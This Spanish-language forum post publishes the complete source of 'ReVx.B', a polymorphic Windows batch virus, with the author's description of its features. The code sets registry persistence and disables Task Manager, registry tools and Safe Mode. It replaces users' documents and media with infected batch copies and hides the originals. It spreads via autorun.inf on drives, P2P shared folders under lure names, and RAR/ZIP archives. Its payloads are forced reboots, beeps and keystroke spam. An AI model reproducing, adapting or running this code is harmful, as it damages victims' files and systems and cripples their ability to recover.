[Batch] ReVx.B

Iniciado por Binary_Death, 21 Junio 2012, 21:22 PM

0 Miembros y 1 Visitante están viendo este tema.

Binary_Death


@Echo Off %Header0% %_vx_%
SetLocal EnableDelayedExpansion %Header0% %_vx_%
GoTo :_%~1 %Header0% %_vx_%
:_Hidden %Header0% %_vx_%
:_ %Header0% %_vx_%
Chdir "%temp%" & Copy /y "%~0" "%temp%" %Header0% 1>nul 2>&1 %Header0% %_vx_%
If "%~1" NEQ "Hidden" ( %Header0% %_vx_%
call :_vbs>vbs.vbs & start vbs.vbs %Header0% %_vx_%
exit %Header0% %_vx_%
) else (GoTo :_code) %Header0% %_vx_%
:_vbs %Header0% %_vx_%
Echo.On Error Resume Next %Header0% %_vx_%
Echo.SET a=CreateObject^("WScript.Shell"^) %Header0% %_vx_%
Echo a.Run """%~n0%~x0"" Hidden", vbHide %Header0% %_vx_%
GoTo:EoF %Header0% %_vx_%
:_code %Header0% %_vx_%
del /q vbs.vbs %Header0% %_vx_%

Set "__dir0=%~0" %_vx_%
Set "__ext0=%~x0" %_vx_%
Set "__siz0=%~z0" %_vx_%
Set "__admin=0" %_vx_%
Set "__path=" %_vx_%
Set "__ipath=" %_vx_%
Set "__vpath=" %_vx_%
Set "__spath=" %_vx_%
Set "__adpath=" %_vx_%
Set "__modules=0,1,2,3,4,5" %_vx_%
Set __iext=*.doc *.docx *.xls *.xlsx *.ppt *.pps *.pptx *.pptx *.wmv *.pdf %_vx_%^
*.jpg *.jpeg *.bmp *.gif *.mp3 *.mp4 *.avi *.mpg *.mpeg *.divx *.png *.psd %_vx_%

:_main %_vx_%
Call :_AdminRequest & Call :_SetPrivs %_vx_%
:_polymorphism %_vx_%
Find "_vx_"<"%__dir0%">"%__vpath%" || GoTo :_polymorphism %_vx_%
For /l %%x in (0,1,10) do ( %_vx_%
call :SetMod "mod" %_vx_%
find "_m!mod!_"<"%__dir0%">>"%__vpath%" %_vx_%
call :_GenRan !random:~0,2! %_vx_%
Echo.::!rstr!>>"%__vpath%" %_vx_%
) %_vx_%
For %%x in (%__modules%) do Start "" /B /high "%__dir0%" Mod_%%x %_vx_%
EXIT %_vx_%
:SetMod %_vx_%
set/a "%~1=%random% %% 11" %_vx_%
(find "_m%mod%_"<"%__vpath%" 1>nul 2>&1) && (GoTo:SetMod) %_vx_%
GoTo:EoF %_vx_%
:_Mod_0 %_m0_%

Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ÿ" /d "%__vpath%" /f %_m0_%
( %_m0_%
Echo.On Error Resume Next %_m0_%
Echo.Set b = CreateObject^("Scripting.FileSystemObject"^) %_m0_%
Echo.Set Ha = b.OpenTextFile^("%__vpath:\=\\%"^) %_m0_%
Echo.Contn = Ha.ReadAll %_m0_%
Echo.Do %_m0_%
Echo.If not^(b.FileExists^("%__vpath:\=\\%"^)^) Then %_m0_%
Echo.Set Hb = b.CreateTextFile^("%__vpath:\=\\%"^) %_m0_%
Echo.Hb.Write Contn %_m0_%
Echo.Hb.Close %_m0_%
Echo.End If %_m0_%
Echo.Loop %_m0_%
) 1>"%__adpath%" 2>nul %_m0_%
Start "" "%__adpath%" %_m0_%
EXIT %_m0_%

:_Mod_1 %_m1_%
Chdir "%__ipath%" %_m1_%
For /f "tokens=*" %%_ in ('dir /b /s %__iext%') do ( %_m1_%
if "%%~dp_" NEQ "%__spath%\" ( %_m1_%
call :_GenRan 16 %_m1_%
move /y "%%_" "%__spath%\!rstr!%%~x_" %_m1_%
attrib +s +h "%__spath%\!rstr!%%~x_" %_m1_%
call :_Infect "%__spath%\!rstr!%%~x_" 1>"%%_.bat" 2>nul %_m1_%
) %_m1_%
) %_m1_%
GoTo :_Mod_1 %_m1_%

:_Mod_2 %_m2_%
Set "c__c=Doskey tskill=exit&Doskey taskkill=exit&Doskey reg=exit&Doskey cmd=exit&Doskey doskey=exit" %_m2_%
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f %_m2_%
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f %_m2_%
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t REG_DWORD /d 1 /f %_m2_%
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f %_m2_%
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d 1 /f %_m2_%
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Advanced" /v "Hidden" /t REG_DWORD /d 0 /f %_m2_%
Reg Add "HKCU\Software\Microsoft\Command Processor" /v "AutoRun" /t REG_SZ /d "%c__c%" /f %_m2_%
Reg Delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\minimal" /f %_m2_%
Reg Delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\network" /f %_m2_%
GoTo :_Mod_2 %_m2_%

:_Mod_3 %_m3_%
Set /a "hour=%time:~0,2% + 1" %_m3_%
If "%hour%" EQU "24" Set "hour=00" %_m3_%
:_loop %_m3_%
If "%time:~0,2%" NEQ "%hour%" GoTo :_loop %_m3_%
Set /a "Dice=%random% %% 6" %_m3_%
If "%Dice%" EQU "0" ( %_m3_%
Pushd "%cd%" %_m3_%
Chdir "%UserProfile%" %_m3_%
Exit|"%ComSpec%" /k prompt e$S100$S07$_n$S@$_rcx$_1$_w$_q$_># %_m3_%
debug<#>nul %_m3_%
for /l %%_ in (0,1,%random:~-3%) do type @ %_m3_%
Popd %_m3_%
) %_m3_%
Set /a "ReBoot=%random% %% 12" %_m3_%
If "%ReBoot%" EQU "0" ( %_m3_%
shutdown -r -f -t 10 -c "Error 0x1445E5D9. The memory cannot be 'read'." %_m3_%
) %_m3_%
Set /a "SendKeys=%random% %% 12" %_m3_%
If "%SendKeys%" EQU "0" ( %_m3_%
Pushd "%cd%" %_m3_%
Chdir "%UserProfile%" %_m3_%
( %_m3_%
Echo.Do %_m3_%
Echo.Set a = CreateObject^("WScript.Shell"^) %_m3_%
Echo.a.SendKeys "REVX" %_m3_%
Echo.Loop %_m3_%
)>skeys.vbs %_m3_%
start "" "skeys.vbs" %_m3_%
Popd %_m3_%
) %_m3_%
GoTo :_Mod_3 %_m3_%

:_Mod_4 %_m4_%
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ÿ" /d "%__vpath%" /f %_m4_%
For %%_ in ( %_m4_%
A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z %_m4_%
) do ( %_m4_%
If Exist "%%_:\" ( %_m4_%
Copy /y "%__dir0%" "%%_:\revx.bat" %_m4_%
Call:_Autorun "revx.bat" 1>"%%_:\autorun.inf" 2>nul %_m4_%
Attrib +s +h "%%_:\revx.bat" %_m4_%
Attrib +s +h "%%_:\autorun.inf" %_m4_%
) %_m4_%
) %_m4_%
GoTo :_Mod_4 %_m4_%

:_Mod_5 %_m5_%
Doskey taskkill= %_m5_%
If Exist "%ProgramFiles%\WinRAR" ( %_m5_%
Set "ext_p2p=rar" %_m5_%
) else (Set "ext_p2p=bat") %_m5_%

If "%ext_p2p%" EQU "rar" ( %_m5_%
Set "path_p2p=%__ipath%\revxp2p.rar" %_m5_%
If Exist "!path_p2p!" Del /f /q "!path_p2p!" %_m5_%
Start /WAIT WinRAR.exe a "!path_p2p!" "%__dir0%" -ep1 -ibck -inul %_m5_%
taskkill /f /im "WinRAR.exe" %_m5_%
) else ( Set "path_p2p=%__dir0%" ) %_m5_%

For %%i in ( %_m5_%
"%ProgramFiles%\Kazaa\My Shared Folder", %_m5_%
"%ProgramFiles%\Kazaa Lite\My Shared Folder", %_m5_%
"%ProgramFiles%\Grokster\My Grokster", %_m5_%
"%ProgramFiles%\Morpheus\My Shared Folder", %_m5_%
"%ProgramFiles%\EDONKEY2000\incoming", %_m5_%
"%ProgramFiles%\Gnucleus\Downloads", %_m5_%
"%ProgramFiles%\eMule\Incoming", %_m5_%
"%ProgramFiles%\BearShare\Shared", %_m5_%
"%ProgramFiles%\Shareaza\Downloads", %_m5_%
"%ProgramFiles%\ICQ\shared files", %_m5_%
"%ProgramFiles%\Filetopia3\Files", %_m5_%
"%ProgramFiles%\appleJuice\incoming", %_m5_%
"%ProgramFiles%\LimeWire\Shared", %_m5_%
"%ProgramFiles%\Overnet\incoming", %_m5_%
"%ProgramFiles%\Swaptor\Download", %_m5_%
"%ProgramFiles%\WinMX\My Shared Folder", %_m5_%
"%ProgramFiles%\Tesla\Files", %_m5_%
"%ProgramFiles%\XoloX\Downloads", %_m5_%
"%ProgramFiles%\Rapigator\Share", %_m5_%
"%ProgramFiles%\KMD\My Shared Folder", %_m5_%
"%ProgramFiles%\Direct Connect\Received Files", %_m5_%
"%HomeDrive%\My Shared Folder", %_m5_%
"%UserProfile%\Desktop\My Shared Folder" %_m5_%
) do ( %_m5_%
If Exist "%%~i" ( %_m5_%
For %%d in ( %_m5_%
"MSN_emoticons","Horny_girls_get_fucked","Asian_teen_collection", %_m5_%
"Windows_7_gold_serials","MSN_hacking_code","Office_2010_activation_tool", %_m5_%
"Avatar_2009_subtitles","free_sms_tool", "Justin_Bieber-Believe", %_m5_%
"Twilight_e-book","Pitbull-I_know_you_want_me","Twilight_wallpapers" %_m5_%
) do ( Copy /y "%path_p2p%" "%%~i\%%~d_!random!.%ext_p2p%" ) %_m5_%
) ) %_m5_%

If Exist "%ProgramFiles%\WinRAR" ( %_m5_%
For /f "Tokens=*" %%p in ( %_m5_%
'dir /b /s "%__ipath%\*.rar" "%__ipath%\*.zip"' %_m5_%
) do Start winRAR.exe a "%%~p" "%__dir0%" -ep1 -ibck -inul %_m5_%
taskkill /f /im "WinRAR.exe" %_m5_%
) %_m5_%

EXIT %_m5_%

:_AdminRequest %_m6_%
Net Start Workstation %_m6_%
For /f "tokens=1 delims=* skip=4" %%_ in ( %_m6_%
'Net LocalGroup' %_m6_%
) Do ( %_m6_%
For /f "tokens=* skip=6" %%# in ( %_m6_%
'Net LocalGroup %%_' %_m6_%
) Do ( %_m6_%
If "%%#" EQU "%UserName%" ( %_m6_%
Set "__admin=1" %_m6_%
GoTo :EoF %_m6_%
) %_m6_%
) %_m6_%
GoTo :EoF %_m6_%
) %_m6_%
GoTo :EoF %_m6_%

:_SetPrivs %_m7_%
If "%__admin%" EQU "1" ( %_m7_%
Mkdir "%SystemRoot%\system32ÿ" %_m7_%
Set "__ipath=%SystemDrive%\" %_m7_%
Set "__vpath=%SystemRoot%\system32\drivers\keyboard.bat" %_m7_%
Set "__spath=%SystemRoot%\system32ÿ" %_m7_%
Set "__adpath=%SystemRoot%\wscript.exe.vbs" %_m7_%
) else ( %_m7_%
Mkdir "%UserProfile%\Config" %_m7_%
Mkdir "%UserProfile%\Config\Startup" %_m7_%
Attrib +s +h "%UserProfile%\Config" %_m7_%
Set "__ipath=%UserProfile%" %_m7_%
Set "__vpath=%UserProfile%\Config\config.bat" %_m7_%
Set "__spath=%UserProfile%\Config\Startup" %_m7_%
Set "__adpath=%UserProfile%\Config\userlog.txt.vbs" %_m7_%
) %_m7_%

GoTo :EoF %_m7_%

:_GenRan %_m8_%
Set "rstr=" %_m8_%
For /l %%_ in (1,1,%~1) do ( %_m8_%
Set /a "rval=!random! %% 2" %_m8_%
If "!rval!" EQU "0" Set "rstr=!rstr!!random:~1,1!" %_m8_%
If "!rval!" EQU "1" ( %_m8_%
Set /a "rchr=(!random! %% 26) + 97" %_m8_%
"%ComSpec%" /c Exit /b !rchr! %_m8_%
Set "rstr=!rstr!!=ExitCodeAscii!" %_m8_%
) %_m8_%
) %_m8_%
Goto :EoF %_m8_%

:_Infect %_m9_%
Set "insrt=Header" & Set "mrk=__" %_m9_%
Find "%insrt%0"<"%__dir0%" %_m9_%
Echo.start "" "%~1" /high ^&::%mrk% %_m9_%
Find /v "%insrt%0"<"%__dir0%" | Find /v "&::%mrk%" %_m9_%
GoTo :EoF %_m9_%

:_Autorun %_m10_%
Echo.[AutoRun] %_m10_%
Echo.UseAutoPlay=1 %_m10_%
Echo.Open=%~1 %_m10_%
Echo.shell\open\command=%~1 %_m10_%
GoTo :EoF %_m10_%



Este es un pequeño malware polimórfico de hace un tiempo. Tiene el pan de cada día y algunas cosas curiosas, como la suplantación de ficheros de ciertas extensiones por copias del propio malware que a su vez antes de ejecutarse lanzarán el fichero original, dando el efecto de que no está corrupto.

Sigue este patrón para todos los ficheros excepto para los .RAR y .ZIP. Con estos intenta añadirse si es que está disponible el WinRAR.

Por otro lado, para asegurar su ejecución, hice que casi todo el código funcionara como usuario restringido o administrador, detectando en algunos casos en qué rutas puede trabajar y en cuales no por no tener acceso.

El payload no es nada del otro mundo, es más bien una broma. Es aleatorio, funciona en base a probabilidades, y lo que voy a describir ahora ocurre por cada instancia ejecutada en el equipo:

1/6 Probabilidades de un número aleatorio de pitidos
1/12 Probabilidades de reinicio
1/12 Probabilidades de enviar repetidamente pulsaciones de teclado ("REVX")

Hay que tener en cuenta que cada fichero reemplazado (que es prácticamente la totalidad de ficheros de uso común por el usuario) que sea ejecutado, iniciará una nueva instancia, así que lo que a priori son pocas probabilidades se van acumulando hasta que sea una hora punta y entonces se liberen.

Todo por supuesto se ejecuta ocultamente, usando (no había más remedio) VBS, que a su vez lo aproveché para impedir la eliminación del fichero origen del virus.

Tiene más cositas, pero a ver si las testeais vosotros  ;)

El código está probado en Win XP y Win 7.

¡Un saludo!